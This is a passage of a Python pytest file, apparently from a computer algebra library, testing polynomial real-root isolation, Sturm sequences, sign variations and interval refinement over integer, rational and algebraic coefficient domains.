    expected = (6*x**8 - 82*x**7 + 541*x**6 - 2205*x**5 + 6277*x**4 -
                12723*x**3 + 17191*x**2 - 13603*x + 4773)
    assert R._transform(f, p, q) == expected
def test__reverse():
    """``_reverse`` reverses a polynomial's coefficient list."""
    R, x = ring('x', ZZ)

    # Pairs of (input, coefficient-reversed output).
    cases = [
        (x**3 + 2*x**2 + 3, 3*x**3 + 2*x + 1),
        (x**3 + 2*x**2 + 3*x, 3*x**2 + 2*x + 1),
    ]
    for f, expected in cases:
        assert R._reverse(f) == expected
def test_sturm():
    """Sturm sequences over QQ, including a parametric fraction field."""
    R, x = ring('x', QQ)
    # Degenerate inputs: a constant and the bare monomial.
    assert R(5).sturm() == [1]
    assert x.sturm() == [x, 1]
    f = x**3 - 2*x**2 + 3*x - 5
    assert f.sturm() == [f, 3*x**2 - 4*x + 3,
                         -10*x/9 + QQ(13, 3), -QQ(3303, 100)]
    f = x**3 - 2*x**2 + x - 3
    assert f.sturm() == [f, 3*x**2 - 4*x + 1, 2*x/9 + QQ(25, 9), QQ(-2079, 4)]
    # Sturm sequences need a field domain; plain ZZ is rejected.
    pytest.raises(DomainError, lambda: x.set_domain(ZZ).sturm())
    # Coefficients from the fraction field ZZ(pi): the sequence is computed
    # symbolically in pi.
    F = ZZ.frac_field('pi')
    pi = F.pi
    R, x = ring('x', F)
    f = (1024/(15625*pi**8)*x**5 - 4096/(625*pi**8)*x**4 + 32/(15625*pi**4)*x**3
         - 128/(625*pi**4)*x**2 + x/62500 - F((1, 625)))
    assert f.sturm() == [x**3 - 100*x**2 + pi**4/64*x - 25*pi**4/16,
                         3*x**2 - 200*x + pi**4/64,
                         (F((20000, 9)) - pi**4/96)*x + 25*pi**4/18,
                         (-3686400000000*pi**4 - 11520000*pi**8 -
                          9*pi**12)/(26214400000000 - 245760000*pi**4 +
                                     576*pi**8)]
def test__sign_variations():
    """Count sign changes in coefficient sequences (Descartes' rule input)."""
    R, x = ring('x', ZZ)
    # All-nonnegative (or all same-sign) coefficient lists: no variations.
    assert R._sign_variations(R(0)) == 0
    assert R._sign_variations(x) == 0
    assert R._sign_variations(x**2 + 2) == 0
    assert R._sign_variations(x*(x**2 + 3)) == 0
    assert R._sign_variations(x**4 + 4*x**2 + 5) == 0
    # Exactly one sign change.
    assert R._sign_variations(2 - x**2) == 1
    assert R._sign_variations(x*(3 - x**2)) == 1
    assert R._sign_variations((5 - x**2)*(x**2 + 1)) == 1
    # Quadratics with various root placements.
    assert R._sign_variations(-x**2 - 4*x - 5) == 0
    assert R._sign_variations((x - 5)*(x + 1)) == 1
    assert R._sign_variations((x - 1)*(x + 5)) == 1
    assert R._sign_variations(+x**2 - 4*x + 5) == 2
    assert R._sign_variations(-x**2 + 4*x - 5) == 2
    assert R._sign_variations((5 - x)*(x + 1)) == 1
    assert R._sign_variations((1 - x)*(x + 5)) == 1
    assert R._sign_variations(+x**2 + 4*x + 5) == 0
    # Degree-4 analogues of the cases above.
    assert R._sign_variations(-x**4 - 4*x**2 - 5) == 0
    assert R._sign_variations((x**2 - 5)*(x**2 + 1)) == 1
    assert R._sign_variations((x - 1)*(x + 1)*(x**2 + 5)) == 1
    assert R._sign_variations(+x**4 - 4*x**2 + 5) == 2
    assert R._sign_variations(-x**4 + 4*x**2 - 5) == 2
    assert R._sign_variations((5 - x**2)*(x**2 + 1)) == 1
    assert R._sign_variations((1 - x)*(x + 1)*(x**2 + 5)) == 1
    assert R._sign_variations(+x**4 + 4*x**2 + 5) == 0
def test__root_upper_bound():
    """Upper bounds on positive real roots from ``_root_upper_bound``."""
    # The same basic pair of checks holds over both ZZ and QQ.
    for domain in (ZZ, QQ):
        R, x = ring('x', domain)
        assert R._root_upper_bound(+x - 1) == 4
        assert R._root_upper_bound(-x - 1) is None

    # Rational (non-integer) leading coefficients: no bound is produced.
    R, x = ring('x', QQ)
    assert R._root_upper_bound(+x/2 - 1) is None
    assert R._root_upper_bound(-x/2 - 1) is None
def test__step_refine_real_root():
    """One refinement step transforms the polynomial and its Mobius tuple."""
    R, x = ring('x', ZZ)
    mobius = (-2, 0, 1, 1)
    result = R._step_refine_real_root(x + 1, mobius)
    assert result == (x + 2, (0, -2, 1, 2))
def test__inner_refine_real_root():
    """A single step narrows the isolating interval of sqrt(2) to (1, 3/2)."""
    R, x = ring('x', ZZ)
    interval = R._inner_refine_real_root(2 - x**2, (1, 2, 1, 1), steps=1)
    assert interval == (1, QQ(3, 2))
def test__refine_real_root():
    """Refine isolating intervals of real roots of x**2 - 2 (i.e. +-sqrt(2)).

    Exercises step-limited refinement, eps-targeted refinement, their
    interaction, the ``disjoint`` hint, and error conditions.
    """
    R, x = ring('x', ZZ)
    f = x**2 - 2
    # A degenerate (rational-root) interval stays fixed regardless of steps.
    assert R._refine_real_root(f, 1, 1, steps=1) == (1, 1)
    assert R._refine_real_root(f, 1, 1, steps=9) == (1, 1)
    # The starting interval must not straddle more than one root.
    pytest.raises(ValueError, lambda: R._refine_real_root(f, -2, 2))
    # Successive bisection-like steps shrink (1, 2) toward sqrt(2).
    s, t = 1, 2
    assert R._refine_real_root(f, s, t, steps=0) == (1, 2)
    assert R._refine_real_root(f, s, t, steps=1) == (1, QQ(3, 2))
    assert R._refine_real_root(f, s, t, steps=2) == (QQ(4, 3), QQ(3, 2))
    assert R._refine_real_root(f, s, t, steps=3) == (QQ(7, 5), QQ(3, 2))
    assert R._refine_real_root(f, s, t, steps=4) == (QQ(7, 5), QQ(10, 7))
    assert R._refine_real_root(f, s, t, eps=QQ(1, 100)) == (QQ(24, 17), QQ(17, 12))
    s, t = 1, QQ(3, 2)
    assert R._refine_real_root(f, s, t, steps=0) == (1, QQ(3, 2))
    assert R._refine_real_root(f, s, t, steps=1) == (QQ(4, 3), QQ(3, 2))
    assert R._refine_real_root(f, s, t, steps=2) == (QQ(7, 5), QQ(3, 2))
    assert R._refine_real_root(f, s, t, steps=3) == (QQ(7, 5), QQ(10, 7))
    assert R._refine_real_root(f, s, t, steps=4) == (QQ(7, 5), QQ(17, 12))
    s, t = 1, QQ(5, 3)
    assert R._refine_real_root(f, s, t, steps=0) == (1, QQ(5, 3))
    assert R._refine_real_root(f, s, t, steps=1) == (1, QQ(3, 2))
    assert R._refine_real_root(f, s, t, steps=2) == (QQ(7, 5), QQ(3, 2))
    assert R._refine_real_root(f, s, t, steps=3) == (QQ(7, 5), QQ(13, 9))
    assert R._refine_real_root(f, s, t, steps=4) == (QQ(7, 5), QQ(27, 19))
    # Reversed endpoints are accepted and normalized (-sqrt(2) branch).
    s, t = -1, -2
    assert R._refine_real_root(f, s, t, steps=0) == (-2, -1)
    assert R._refine_real_root(f, s, t, steps=1) == (-QQ(3, 2), -1)
    assert R._refine_real_root(f, s, t, steps=2) == (-QQ(3, 2), -QQ(4, 3))
    assert R._refine_real_root(f, s, t, steps=3) == (-QQ(3, 2), -QQ(7, 5))
    assert R._refine_real_root(f, s, t, steps=4) == (-QQ(10, 7), -QQ(7, 5))
    # (0, 1) contains no root of f at all.
    pytest.raises(RefinementFailed, lambda: R._refine_real_root(f, 0, 1))
    # When both eps and steps are given, refinement stops at whichever
    # criterion is satisfied first.
    s, t, u, v, w = 1, 2, QQ(24, 17), QQ(17, 12), QQ(7, 5)
    assert R._refine_real_root(f, s, t, eps=QQ(1, 100)) == (u, v)
    assert R._refine_real_root(f, s, t, steps=6) == (u, v)
    assert R._refine_real_root(f, s, t, eps=QQ(1, 100), steps=5) == (w, v)
    assert R._refine_real_root(f, s, t, eps=QQ(1, 100), steps=6) == (u, v)
    assert R._refine_real_root(f, s, t, eps=QQ(1, 100), steps=7) == (u, v)
    # ``disjoint`` only triggers refinement when the given point could lie
    # inside the current interval.
    s, t, u, v = -2, -1, QQ(-3, 2), QQ(-4, 3)
    assert R._refine_real_root(f, s, t, disjoint=-5) == (s, t)
    assert R._refine_real_root(f, s, t, disjoint=-v) == (s, t)
    assert R._refine_real_root(f, s, t, disjoint=v) == (u, v)
    s, t, u, v = 1, 2, QQ(4, 3), QQ(3, 2)
    assert R._refine_real_root(f, s, t, disjoint=5) == (s, t)
    assert R._refine_real_root(f, s, t, disjoint=-u) == (s, t)
    assert R._refine_real_root(f, s, t, disjoint=u) == (u, v)
    f = x**2 - 3
    assert R._refine_real_root(f, 1, 2,
                               eps=QQ(1, 100)) == (QQ(19, 11), QQ(26, 15))
    # Rational roots over QQ collapse to a point interval.
    R, x = ring('x', QQ)
    f = (x - QQ(1, 2))*(x + QQ(1, 2))
    assert R._refine_real_root(f, 0, 1, steps=1) == (QQ(1, 2), QQ(1, 2))
    # Polynomial coefficient domains are not supported.
    D, y = ring('y', ZZ)
    R, x = ring('x', D)
    f = x**2 + y*x - 1
    pytest.raises(DomainError, lambda: R._refine_real_root(f, 0, 1))
def test__isolate_real_roots_sqf():
    """Isolate real roots of square-free polynomials.

    Covers: trivial/constant inputs, rational roots (point intervals),
    ``inf``/``sup`` clipping, ``eps``-controlled precision, clustered and
    huge roots, the ``blackbox`` flag, and algebraic coefficient fields.
    """
    R, x = ring('x', ZZ)
    # Constants have no roots; x has the single point root 0.
    assert R._isolate_real_roots_sqf(R(0)) == []
    assert R._isolate_real_roots_sqf(R(5)) == []
    assert R._isolate_real_roots_sqf(x) == [(0, 0)]
    f = x*(x + 1)
    assert R._isolate_real_roots_sqf(f) == [(-1, -1), (0, 0)]
    # inf/sup restrict the search interval.
    assert R._isolate_real_roots_sqf(f, inf=+1) == []
    assert R._isolate_real_roots_sqf(f, sup=-1) == [(-1, -1)]
    assert R._isolate_real_roots_sqf(f, sup=-2) == []
    f = x*(x - 1)
    assert R._isolate_real_roots_sqf(f) == [(0, 0), (1, 1)]
    # No real roots at all.
    assert R._isolate_real_roots_sqf(x**4 + x + 1) == []
    i = [(-2, -1), (1, 2)]
    f = x**2 - 2
    # Sign of the polynomial does not change the isolating intervals.
    assert R._isolate_real_roots_sqf(+f) == i
    assert R._isolate_real_roots_sqf(-f) == i
    # Products of distinct scaled linear factors: every root is rational,
    # so each isolating interval degenerates to a point.
    for r in range(2, 7):
        for s in (1, 10, -1, -10):
            f = R(math.prod(x - s*_ for _ in range(1, r)))
            ans = sorted((s*_, s*_) for _ in range(1, r))
            assert R._isolate_real_roots_sqf(f) == ans
    # Radicals x**n - 5 for n = 2..9: even n gives a negative root too.
    assert R._isolate_real_roots_sqf(x**2 - 5) == [(-3, -2), (2, 3)]
    assert R._isolate_real_roots_sqf(x**3 - 5) == [(1, 2)]
    assert R._isolate_real_roots_sqf(x**4 - 5) == [(-2, -1), (1, 2)]
    assert R._isolate_real_roots_sqf(x**5 - 5) == [(1, 2)]
    assert R._isolate_real_roots_sqf(x**6 - 5) == [(-2, -1), (1, 2)]
    assert R._isolate_real_roots_sqf(x**7 - 5) == [(1, 2)]
    assert R._isolate_real_roots_sqf(x**8 - 5) == [(-2, -1), (1, 2)]
    assert R._isolate_real_roots_sqf(x**9 - 5) == [(1, 2)]
    # Every subset of {1, 2, 3} as a root set.
    for roots in subsets(range(1, 4)):
        f = R(math.prod(x - r for r in roots))
        ans = sorted((_, _) for _ in roots)
        assert R._isolate_real_roots_sqf(f) == ans
    assert R._isolate_real_roots_sqf((x - 3)*(x - 2)*(x - 1)*(x + 1)*(x + 2)*(x + 3)*(2*x + 1)) == \
        [(-3, -3), (-2, -2), (-1, -1), (-1, 0), (1, 1), (2, 2), (3, 3)]
    assert R._isolate_real_roots_sqf((x - 3)*(x - 2)*(x - 1)*(x + 1)*(x + 2)*(x + 3)*(2*x - 1)*(2*x + 1)) == \
        [(-3, -3), (-2, -2), (-1, -1), (-1, 0), (0, 1), (1, 1), (2, 2), (3, 3)]
    # Shrinking eps tightens the intervals around +-sqrt(2)/3.
    f = 9*x**2 - 2
    assert R._isolate_real_roots_sqf(f) == \
        [(-1, 0), (0, 1)]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 10)) == \
        [(QQ(-1, 2), QQ(-3, 7)), (QQ(3, 7), QQ(1, 2))]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100)) == \
        [(QQ(-9, 19), QQ(-8, 17)), (QQ(8, 17), QQ(9, 19))]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 1000)) == \
        [(QQ(-33, 70), QQ(-8, 17)), (QQ(8, 17), QQ(33, 70))]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 10000)) == \
        [(QQ(-33, 70), QQ(-107, 227)), (QQ(107, 227), QQ(33, 70))]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100000)) == \
        [(QQ(-305, 647), QQ(-272, 577)), (QQ(272, 577), QQ(305, 647))]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 1000000)) == \
        [(QQ(-1121, 2378), QQ(-272, 577)), (QQ(272, 577), QQ(1121, 2378))]
    # Tightly clustered rational roots (1/10002 vs 1/10003) are still
    # separated; high eps pins them to point intervals.
    f = (x - 2)*(x - 1)*(2*x - 1)*(10002*x - 1)*(10003*x - 1)
    assert R._isolate_real_roots_sqf(f) == \
        [(QQ(15, 150046), QQ(47, 470110)), (QQ(47, 470110), QQ(17, 170018)),
         (QQ(1, 2), QQ(1, 2)), (1, 1), (2, 2)]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100000000000)) == \
        [(QQ(1, 10003), QQ(1, 10003)), (QQ(1, 10002), QQ(1, 10002)),
         (QQ(1, 2), QQ(1, 2)), (1, 1), (2, 2)]
    # Mixture of huge and tiny roots.
    a, b, c, d = 10000090000001, 2000100003, 10000300007, 10000005000008
    f = (x - d)*(x + a)*(b*x + 1)*(c*x - 1)
    assert R._isolate_real_roots_sqf(f) == \
        [(-13194139533313, -8796093022209), (-1, 0), (0, 1),
         (8796093022209, 13194139533313)]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100000000000)) == \
        [(-a, -a), (QQ(-7, 13958643719), QQ(-1, 2013265921)),
         (QQ(3, 30064771075), QQ(1, 9663676417)),
         (QQ(1328823874562668133568119, 132882321015),
          QQ(37336367728494399224248237, 3733634906029))]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100000000000000000000000000000)) == \
        [(-a, -a), (-QQ(1, b), -QQ(1, b)), (QQ(1, c), QQ(1, c)), (d, d)]
    f = -2*(x - 2)*(x + 2)*(5*x**2 - 4*x - 20)
    assert R._isolate_real_roots_sqf(f) == \
        [(-2, -2), (-2, -1), (2, 2), (2, 3)]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100)) == \
        [(-2, -2), (-QQ(23, 14), -QQ(18, 11)), (2, 2), (QQ(39, 16), QQ(22, 9))]
    # inf/sup boundaries are inclusive.
    f = x - 1
    assert R._isolate_real_roots_sqf(f, inf=2) == []
    assert R._isolate_real_roots_sqf(f, sup=0) == []
    assert R._isolate_real_roots_sqf(f) == [(1, 1)]
    assert R._isolate_real_roots_sqf(f, inf=1) == [(1, 1)]
    assert R._isolate_real_roots_sqf(f, sup=1) == [(1, 1)]
    assert R._isolate_real_roots_sqf(f, inf=1, sup=1) == [(1, 1)]
    # Rational inf/sup values clip the intervals around +-sqrt(2).
    f = x**2 - 2
    assert R._isolate_real_roots_sqf(f, inf=QQ(7, 4)) == []
    assert R._isolate_real_roots_sqf(f, inf=QQ(7, 5)) == [(QQ(7, 5), QQ(3, 2))]
    assert R._isolate_real_roots_sqf(f, sup=QQ(7, 5)) == [(-2, -1)]
    assert R._isolate_real_roots_sqf(f, sup=QQ(7, 4)) == [(-2, -1), (1, QQ(3, 2))]
    assert R._isolate_real_roots_sqf(f, sup=-QQ(7, 4)) == []
    assert R._isolate_real_roots_sqf(f, sup=-QQ(7, 5)) == [(-QQ(3, 2), -QQ(7, 5))]
    assert R._isolate_real_roots_sqf(f, inf=-QQ(7, 5)) == [(1, 2)]
    assert R._isolate_real_roots_sqf(f, inf=-QQ(7, 4)) == [(-QQ(3, 2), -1), (1, 2)]
    i = [(-2, -1), (1, 2)]
    assert R._isolate_real_roots_sqf(f, inf=-2) == i
    assert R._isolate_real_roots_sqf(f, sup=+2) == i
    assert R._isolate_real_roots_sqf(f, inf=-2, sup=2) == i
    assert R._isolate_real_roots_sqf(f, inf=+1) == [i[1]]
    assert R._isolate_real_roots_sqf(f, sup=-1) == [i[0]]
    f = (2*x - 3)*(x**2 - 3)*(x**2 - 2)
    assert R._isolate_real_roots_sqf(f) == \
        [(-2, -QQ(3, 2)), (-QQ(3, 2), -QQ(1, 1)), (1, QQ(3, 2)),
         (QQ(3, 2), QQ(3, 2)), (QQ(3, 2), 2)]
    f = 7*x**4 - 19*x**3 + 20*x**2 + 17*x + 20
    assert R._isolate_real_roots_sqf(f) == []
    # Rational coefficient domain; ``blackbox=True`` returns RealInterval
    # objects instead of plain tuples.
    R, x = ring('x', QQ)
    f = (6*x - 85)*(1028*x + 1)/3855
    assert R._isolate_real_roots_sqf(f) == [(-1, 0), (14, 15)]
    assert [_.as_tuple() for _ in R._isolate_real_roots_sqf(f, blackbox=True)] == [(-1, 0), (14, 15)]
    f = (2*x/5 - QQ(17, 3))*(4*x + QQ(1, 257))
    assert R._isolate_real_roots_sqf(f) == [(-1, 0), (14, 15)]
    # The EX domain is unsupported.
    R, x = ring('x', EX)
    pytest.raises(DomainError, lambda: R._isolate_real_roots_sqf(x + 3))
    # Gaussian-rational coefficients: only real roots are reported.
    R, x = ring('x', QQ.algebraic_field(I))
    f = (x - 1)*(x**3 + I*x - 2)
    assert R._isolate_real_roots_sqf(f) == [(1, 1)]
    assert R._isolate_real_roots_sqf(f, sup=0) == []
    f = (x**2 - 2)*(x**3 - x + I)
    assert R._isolate_real_roots_sqf(f) == [(QQ(-3, 2), QQ(-4, 3)), (QQ(4, 3), QQ(3, 2))]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 10), inf=0) == [(QQ(7, 5), QQ(10, 7))]
    assert R._isolate_real_roots_sqf(x) == [(0, 0)]
    assert R._isolate_real_roots_sqf(x - 1) == [(1, 1)]
    assert R._isolate_real_roots_sqf(x - I) == []
    f = (x + I)*(x - 1)
    assert [_.as_tuple() for _ in R._isolate_real_roots_sqf(f, blackbox=True)] == [(1, 1)]
    # Real algebraic coefficient fields.
    R, x = ring('x', QQ.algebraic_field(sqrt(2)))
    f = (-x**3 + sqrt(2)*x - 1)*(x**2 + 1)
    assert R._isolate_real_roots_sqf(f) == [(-2, -1)]
    assert R._isolate_real_roots_sqf(f, eps=QQ(1, 1000)) == [(QQ(-132, 91), QQ(-29, 20))]
    f = (x - sqrt(2))*(x + 2*sqrt(2))*(x - 7 + sqrt(2))*(x + 3*sqrt(2))*(x - 1)*(x + 1 - sqrt(2))
    assert R._isolate_real_roots_sqf(f) == [(-5, -4), (-3, -2), (0, 1),
                                            (1, 1), (1, 2), (5, 6)]
    R, x = ring('x', QQ.algebraic_field(sqrt(2), sqrt(3)))
    f = (x - sqrt(2))*(x - sqrt(3))*(x - 2*sqrt(6))*(x - sqrt(6))*(x**2 + 2)
    assert R._isolate_real_roots_sqf(f) == [(1, QQ(3, 2)), (QQ(3, 2), 2),
                                            (2, 3), (4, 5)]
    assert (R._isolate_real_roots_sqf(f, eps=QQ(1, 1000)) ==
            [(QQ(41, 29), QQ(58, 41)), (QQ(71, 41), QQ(97, 56)),
             (QQ(218, 89), QQ(49, 20)), (QQ(436, 89), QQ(485, 99))])
def test__isolate_real_roots():
    """Isolate real roots together with multiplicities.

    Exercises ``R._isolate_real_roots`` over ZZ, QQ, EX and QQ(I): each
    result is a list of ``((inf, sup), multiplicity)`` pairs with disjoint
    isolating intervals, optionally restricted by ``inf``/``sup`` bounds or
    refined to width ``eps``.
    """
    R, x = ring('x', ZZ)

    # Constants have no roots; pure powers of x give the exact root (0, 0)
    # with the full multiplicity.
    assert R._isolate_real_roots(R(0)) == []
    assert R._isolate_real_roots(R(1)) == []
    assert R._isolate_real_roots(R(3)) == []
    assert R._isolate_real_roots(x) == [((0, 0), 1)]
    assert R._isolate_real_roots(5*x) == [((0, 0), 1)]
    assert R._isolate_real_roots(7*x**4) == [((0, 0), 4)]
    assert R._isolate_real_roots(x**128) == [((0, 0), 128)]
    assert R._isolate_real_roots(x*(x + 1)) == [((-1, -1), 1), ((0, 0), 1)]
    assert R._isolate_real_roots(x*(x - 1)) == [((0, 0), 1), ((1, 1), 1)]
    assert R._isolate_real_roots(x**4 + x + 1) == []

    # Sign of the leading coefficient must not affect the result.
    i = [((-2, -1), 1), ((1, 2), 1)]
    assert R._isolate_real_roots(+x**2 - 2) == i
    assert R._isolate_real_roots(-x**2 + 2) == i

    # Repeated factors: multiplicities follow the factor exponents.
    f = (2*x - 3)**4*(x**2 - 3)**2*(x**2 - 2)**3
    assert R._isolate_real_roots(f) == \
        [((-2, -QQ(3, 2)), 2), ((-QQ(3, 2), -QQ(1, 1)), 3), ((1, QQ(3, 2)), 3),
         ((QQ(3, 2), QQ(3, 2)), 4), ((QQ(5, 3), 2), 2)]
    f = (2*x - 3)*(x**2 - 3)*(x**2 - 2)
    assert R._isolate_real_roots(f) == \
        [((-2, -QQ(3, 2)), 1), ((-QQ(3, 2), -QQ(1, 1)), 1), ((1, QQ(3, 2)), 1),
         ((QQ(3, 2), QQ(3, 2)), 1), ((QQ(3, 2), 2), 1)]

    # inf/sup bounds are inclusive: the root at 1 is kept when a bound
    # coincides with it.
    f = x - 1
    assert R._isolate_real_roots(f, inf=2) == []
    assert R._isolate_real_roots(f, sup=0) == []
    assert R._isolate_real_roots(f) == [((1, 1), 1)]
    assert R._isolate_real_roots(f, inf=1) == [((1, 1), 1)]
    assert R._isolate_real_roots(f, sup=1) == [((1, 1), 1)]
    assert R._isolate_real_roots(f, inf=1, sup=1) == [((1, 1), 1)]

    # Bounds falling strictly between/inside isolating intervals.
    f = (x**2 - 2)**2
    assert R._isolate_real_roots(f, inf=QQ(7, 4)) == []
    assert R._isolate_real_roots(f, inf=QQ(7, 5)) == [((QQ(7, 5), QQ(3, 2)), 2)]
    assert R._isolate_real_roots(f, sup=QQ(7, 5)) == [((-2, -1), 2)]
    assert R._isolate_real_roots(f, sup=QQ(7, 4)) == [((-2, -1), 2), ((1, QQ(3, 2)), 2)]
    assert R._isolate_real_roots(f, sup=-QQ(7, 4)) == []
    assert R._isolate_real_roots(f, sup=-QQ(7, 5)) == [((-QQ(3, 2), -QQ(7, 5)), 2)]
    assert R._isolate_real_roots(f, inf=-QQ(7, 5)) == [((1, 2), 2)]
    assert R._isolate_real_roots(f, inf=-QQ(7, 4)) == [((-QQ(3, 2), -1), 2), ((1, 2), 2)]
    i = [((-2, -1), 2), ((1, 2), 2)]
    assert R._isolate_real_roots(f, inf=-2) == i
    assert R._isolate_real_roots(f, sup=+2) == i
    assert R._isolate_real_roots(f, inf=-2, sup=2) == i

    f = x**4*(x - 1)**3*(x**2 - 2)**2
    assert R._isolate_real_roots(f) == \
        [((-2, -1), 2), ((0, 0), 4), ((1, 1), 3), ((1, 2), 2)]

    # A high-degree product with closely clustered roots.
    f = x**45 - 45*x**44 + 990*x**43 - 1
    g = (x**46 - 15180*x**43 + 9366819*x**40 - 53524680*x**39 +
         260932815*x**38 - 1101716330*x**37 + 4076350421*x**36 -
         13340783196*x**35 + 38910617655*x**34 - 101766230790*x**33 +
         239877544005*x**32 - 511738760544*x**31 + 991493848554*x**30 -
         1749695026860*x**29 + 2818953098830*x**28 - 4154246671960*x**27 +
         5608233007146*x**26 - 6943526580276*x**25 + 7890371113950*x**24 -
         8233430727600*x**23 + 7890371113950*x**22 - 6943526580276*x**21 +
         5608233007146*x**20 - 4154246671960*x**19 + 2818953098830*x**18 -
         1749695026860*x**17 + 991493848554*x**16 - 511738760544*x**15 +
         239877544005*x**14 - 101766230790*x**13 + 38910617655*x**12 -
         13340783196*x**11 + 4076350421*x**10 - 1101716330*x**9 +
         260932815*x**8 - 53524680*x**7 + 9366819*x**6 - 1370754*x**5 +
         163185*x**4 - 15180*x**3 + 1035*x**2 - 47*x + 1)
    assert R._isolate_real_roots(f*g) == \
        [((0, QQ(1, 2)), 1), ((QQ(2, 3), QQ(3, 4)), 1), ((QQ(3, 4), 1), 1), ((6, 7), 1), ((24, 25), 1)]

    # eps refinement shrinks the isolating intervals.
    f = x**2 - 3
    assert R._isolate_real_roots(f) == [((-2, -1), 1), ((1, 2), 1)]
    assert R._isolate_real_roots(f, eps=QQ(1, 100)) == [((QQ(-26, 15), QQ(-19, 11)), 1), ((QQ(19, 11), QQ(26, 15)), 1)]

    f = x**4 - 4*x**2 + 4
    assert R._isolate_real_roots(f, inf=QQ(7, 4)) == []
    assert R._isolate_real_roots(f, inf=QQ(7, 5)) == [((QQ(7, 5), QQ(3, 2)), 2)]
    assert R._isolate_real_roots(f, sup=QQ(7, 4)) == [((-2, -1), 2), ((1, QQ(3, 2)), 2)]
    assert R._isolate_real_roots(f, sup=QQ(7, 5)) == [((-2, -1), 2)]

    f = (x**2 - 2)*(x**2 - 3)**7*(x + 1)*(7*x + 3)**3
    assert R._isolate_real_roots(f) == [((-2, -QQ(3, 2)), 7), ((-QQ(3, 2), -1), 1),
                                        ((-1, -1), 1), ((-1, 0), 3),
                                        ((1, QQ(3, 2)), 1), ((QQ(3, 2), 2), 7)]

    # No real roots at all.
    f = 7*x**4 - 19*x**3 + 20*x**2 + 17*x + 20
    assert R._isolate_real_roots(f) == []

    # Over QQ: results must match the ZZ-cleared polynomial's roots.
    R, x = ring('x', QQ)

    f = (2*x/5 - QQ(17, 3))*(4*x + QQ(1, 257))
    assert R._isolate_real_roots(f) == [((-1, 0), 1), ((14, 15), 1)]
    assert R._isolate_real_roots(f, eps=QQ(1, 10)) == [((-QQ(1, 513), 0), 1), ((QQ(85, 6), QQ(85, 6)), 1)]
    assert R._isolate_real_roots(f, eps=QQ(1, 100)) == [((-QQ(1, 513), 0), 1), ((QQ(85, 6), QQ(85, 6)), 1)]
    assert R._isolate_real_roots(f, eps=QQ(1, 1000)) == [((-QQ(1, 1025), 0), 1), ((QQ(85, 6), QQ(85, 6)), 1)]
    assert R._isolate_real_roots(f, eps=QQ(1, 10000)) == [((-QQ(1, 1025), -QQ(65, 66881)), 1), ((QQ(85, 6), QQ(85, 6)), 1)]

    # Unsupported domain (EX) raises DomainError.
    R, x = ring('x', EX)

    pytest.raises(DomainError, lambda: R._isolate_real_roots(x + 3))
    pytest.raises(DomainError, lambda: R._isolate_real_roots((x + 2)*(x + 3)**2))

    # Algebraic-field coefficients: only real roots are reported.
    R, x = ring('x', QQ.algebraic_field(I))

    f = (x**2 - I)**2*(x - 2*I)**3
    assert R._isolate_real_roots(f) == []  # issue diofant/diofant#789
    assert R._isolate_real_roots(f*(x - 1)**3) == [((1, 1), 3)]

    f = x**4*(x - 1)**3*(x**2 - 2)**2
    assert R._isolate_real_roots(f) == \
        [((-2, -1), 2), ((0, 0), 4), ((1, 1), 3), ((QQ(4, 3), QQ(3, 2)), 2)]
def test__isolate_real_roots_pair():
    """Isolate real roots of a pair of polynomials simultaneously.

    Each result entry is ``((inf, sup), {poly_index: multiplicity})``; an
    interval may contain a root of either or both input polynomials.  Also
    checks the ``strict``, ``basis``, ``inf``/``sup`` options and the
    zero-polynomial corner case.
    """
    R, x = ring('x', ZZ)

    assert R._isolate_real_roots_pair(x*(x + 1), x) == \
        [((-1, -1), {0: 1}), ((0, 0), {0: 1, 1: 1})]
    assert R._isolate_real_roots_pair(x*(x - 1), x) == \
        [((0, 0), {0: 1, 1: 1}), ((1, 1), {0: 1})]

    # Bounds interact with each polynomial's roots independently.
    f, g = (x**2 - 2)**2, x - 1
    assert R._isolate_real_roots_pair(f, g, inf=QQ(7, 4)) == []
    assert R._isolate_real_roots_pair(f, g, inf=QQ(7, 5)) == \
        [((QQ(7, 5), QQ(3, 2)), {0: 2})]
    assert R._isolate_real_roots_pair(f, g, sup=QQ(7, 5)) == \
        [((-2, -1), {0: 2}), ((1, 1), {1: 1})]
    assert R._isolate_real_roots_pair(f, g, sup=QQ(7, 4)) == \
        [((-2, -1), {0: 2}), ((1, 1), {1: 1}), ((1, QQ(3, 2)), {0: 2})]
    assert R._isolate_real_roots_pair(f, g, sup=-QQ(7, 4)) == []
    assert R._isolate_real_roots_pair(f, g, sup=-QQ(7, 5)) == \
        [((-QQ(3, 2), -QQ(7, 5)), {0: 2})]
    assert R._isolate_real_roots_pair(f, g, inf=-QQ(7, 5)) == \
        [((1, 1), {1: 1}), ((1, 2), {0: 2})]
    assert R._isolate_real_roots_pair(f, g, inf=-QQ(7, 4)) == \
        [((-QQ(3, 2), -1), {0: 2}), ((1, 1), {1: 1}), ((1, 2), {0: 2})]

    # strict=True forces intervals of different polynomials to be disjoint.
    f, g = 2*x**2 - 1, x**2 - 2
    assert R._isolate_real_roots_pair(f, g) == \
        [((-2, -1), {1: 1}), ((-1, 0), {0: 1}),
         ((0, 1), {0: 1}), ((1, 2), {1: 1})]
    assert R._isolate_real_roots_pair(f, g, strict=True) == \
        [((-QQ(3, 2), -QQ(4, 3)), {1: 1}), ((-1, -QQ(2, 3)), {0: 1}),
         ((QQ(2, 3), 1), {0: 1}), ((QQ(4, 3), QQ(3, 2)), {1: 1})]

    # Shared roots appear with entries for both polynomials.
    f, g = x**2 - 2, (x - 1)*(x**2 - 2)
    assert R._isolate_real_roots_pair(f, g) == \
        [((-2, -1), {1: 1, 0: 1}), ((1, 1), {1: 1}), ((1, 2), {1: 1, 0: 1})]

    f, g = x*(x**2 - 2), x**2*(x - 1)*(x**2 - 2)
    assert R._isolate_real_roots_pair(f, g) == \
        [((-2, -1), {1: 1, 0: 1}), ((0, 0), {0: 1, 1: 2}),
         ((1, 1), {1: 1}), ((1, 2), {1: 1, 0: 1})]

    # basis=True also returns the (field-domain) factor isolating each root.
